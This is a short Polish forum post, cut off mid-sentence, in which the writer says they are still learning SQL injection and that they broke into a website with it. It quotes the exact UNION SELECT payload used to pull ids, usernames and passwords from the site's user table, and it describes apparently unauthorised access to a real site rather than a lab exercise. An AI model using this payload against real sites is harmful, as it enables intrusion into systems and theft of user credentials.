Sqli znam tak średnio - ale czytam jeszcze arty, by się doszkolić. Tak jak napisałem na samym początku - udało mi się wejść na tą stronkę za pomocą sqli:
....id=999+union+select+1,2,3,4,concat(id,char(58),nazwa,char(58),haslo),6+from+uzytkownik takie zapytanie wykonałem (końcowe, bo przy union...